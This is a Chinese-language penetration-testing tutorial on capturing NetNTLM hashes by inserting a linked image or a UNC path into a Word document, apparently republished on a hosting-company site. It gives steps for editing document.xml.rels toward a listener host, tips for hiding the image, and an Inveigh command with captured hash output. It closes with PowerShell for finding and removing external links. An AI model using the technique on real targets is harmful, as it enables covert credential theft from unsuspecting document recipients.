您好,登錄后才能下訂單哦!
如何利用Microsoft Word中的圖像鏈接進(jìn)行UNC路徑注入滲透,針對(duì)這個(gè)問(wèn)題,這篇文章詳細(xì)介紹了相對(duì)應(yīng)的分析和解答,希望可以幫助更多想解決這個(gè)問(wèn)題的小伙伴找到更簡(jiǎn)單易行的方法。
我們都知道Word文檔常會(huì)被一些黑客所利用,進(jìn)行各式各樣的入侵活動(dòng)。而在Web應(yīng)用滲透和紅隊(duì)比賽中,Word文檔也可被用于抓取NetNTLM哈?;蛴脕?lái)證明網(wǎng)絡(luò)出口過(guò)濾不嚴(yán)等問(wèn)題。在不久前,netbiosX曾在他的博客發(fā)布過(guò)一篇關(guān)于通過(guò)frameset抓取NetNTLM哈希的文章。本文的核心思路與該文是相同的,只是用了不同的一種方式:即通過(guò)一個(gè)鏈接插入圖片。
下面將會(huì)用到的工具:
Burp Suite Pro (collaborator客戶(hù)端)
Inveigh
Responder (抓取hash)
7zip (提取文檔文件)
我們首先打開(kāi)菜單欄上的“插入”選項(xiàng)卡并單擊“圖片”圖標(biāo)。此時(shí)將會(huì)彈出資源管理器窗口。在文件名字段中輸入我們的惡意URL,并點(diǎn)擊“插入”下拉菜單選擇“鏈接到文件”。這樣我們就成功插入了一個(gè)burp collaborator的鏈接。
如果你的惡意文檔是用于紅隊(duì)或社會(huì)工程項(xiàng)目的,那么你還可以通過(guò)Layout選項(xiàng)來(lái)調(diào)整圖像大小,以提高其隱蔽性。
請(qǐng)確保已將更改保存到文檔中?,F(xiàn)在無(wú)論何時(shí)打開(kāi)此文檔,Microsoft Word都會(huì)嘗試解析文檔中的圖像鏈接。這些請(qǐng)求都將在Burp Collaborator客戶(hù)端中被記錄。
同樣,這里我們用到的方法和netbiosX是一樣的,使用7zip提取Word文檔中包含的文件。我們要修改的文件是\your_word_doc.docx\word\_rels\下的document.xml.rels。該文件包含了一系列相互關(guān)聯(lián)的目標(biāo),我們要做的就是將相關(guān)目標(biāo)值設(shè)置為偵聽(tīng)主機(jī)的UNC路徑。
保存該文件并使用7zip將其復(fù)制到word文檔中。
一旦用戶(hù)打開(kāi)Word文檔,Inveigh或Responder將會(huì)捕獲傳入的身份驗(yàn)證請(qǐng)求。
PS C:\> Invoke-Inveigh -NBNS N -LLMNR N -ConsoleOutput Y -IP 192.168.0.2 Inveigh 1.3.1 started at 2017-12-19T17:22:26 Elevated Privilege Mode = Enabled WARNING: Windows Firewall = Enabled Primary IP Address = 192.168.0.2 LLMNR Spoofer = Disabled mDNS Spoofer = Disabled NBNS Spoofer = Disabled SMB Capture = Enabled WARNING: HTTP Capture Disabled Due To In Use Port 80 HTTPS Capture = Disabled Machine Account Capture = Disabled Real Time Console Output = Enabled Real Time File Output = Disabled WARNING: Run Stop-Inveigh to stop Inveigh Press any key to stop real time console output 2017-12-19T17:23:19 SMB NTLMv2 challenge/response captured from 192.168.0.3(DESKTOP-2QRDJR2): Administrator::DESKTOP-2QRDJR2:57[TRUNCATED]cb:091[TRUNCATED]5BC:010[TRUNCATED]02E0032002E00310038003200000000000000000000000000
這種方法的一個(gè)主要有點(diǎn)是,其隱蔽性非常的高。一旦文檔被打開(kāi)就會(huì)發(fā)出請(qǐng)求,且不會(huì)向用戶(hù)顯示和提醒可能的惡意URL或UNC路徑。
上面用到的方法很簡(jiǎn)單,但卻非常的有效,這是因?yàn)槲覀兝昧薓icrosoft Office中的可信功能。接下來(lái)我將介紹兩種簡(jiǎn)單的枚舉關(guān)聯(lián)目標(biāo)的方法,這里將不會(huì)用到7zip。當(dāng)然也有很多優(yōu)秀的取證工具可以完成這些任務(wù),如Yara。
Word.Application COM對(duì)象可被用于訪(fǎng)問(wèn)Word文檔的內(nèi)容。這可以通過(guò)幾個(gè)簡(jiǎn)單的命令來(lái)實(shí)現(xiàn)。WordOpenXML屬性包含文檔中的關(guān)聯(lián)。
$file = "C:\path\to\doc.docx" $word = New-Object -ComObject Word.Application $doc = $word.documents.open($file) $xml = New-Object System.XML.XMLDocument $xml = $doc.WordOpenXML $targets = $xml.package.part.xmlData.Relationships.Relationship $targets | Format-Table $word.Quit()
這將成功枚舉文檔中的所有關(guān)聯(lián)的目標(biāo)。這里的問(wèn)題是,當(dāng)使用Word.Application COM對(duì)象時(shí),將啟動(dòng)Word進(jìn)程并解析URL/UNC路徑。
為了避免這種情況,我們可以使用DocumentFormat.OpenXML庫(kù)并枚舉文檔中所有的外部關(guān)聯(lián)。在測(cè)試中使用該方法,并沒(méi)有捕獲collaborator請(qǐng)求或身份驗(yàn)證請(qǐng)求。
[System.Reflection.Assembly]::LoadFrom("C:\DocumentFormat.OpenXml.dll") $file = "C:\path\to\doc.docx" $doc = [DocumentFormat.OpenXml.Packaging.WordprocessingDocument]::Open($file,$true) $targets = $doc.MainDocumentPart.ExternalRelationships $targets $doc.Close()
更進(jìn)一步,DeleteExternalRelationship方法將通過(guò)提供關(guān)聯(lián)id來(lái)移除與外部URL的關(guān)系。
$doc.MainDocumentPart.DeleteExternalRelationship("rId4")
關(guān)于如何利用Microsoft Word中的圖像鏈接進(jìn)行UNC路徑注入滲透問(wèn)題的解答就分享到這里了,希望以上內(nèi)容可以對(duì)大家有一定的幫助,如果你還有很多疑惑沒(méi)有解開(kāi),可以關(guān)注億速云行業(yè)資訊頻道了解更多相關(guān)知識(shí)。
免責(zé)聲明:本站發(fā)布的內(nèi)容(圖片、視頻和文字)以原創(chuàng)、轉(zhuǎn)載和分享為主,文章觀點(diǎn)不代表本網(wǎng)站立場(chǎng),如果涉及侵權(quán)請(qǐng)聯(lián)系站長(zhǎng)郵箱:is@yisu.com進(jìn)行舉報(bào),并提供相關(guān)證據(jù),一經(jīng)查實(shí),將立刻刪除涉嫌侵權(quán)內(nèi)容。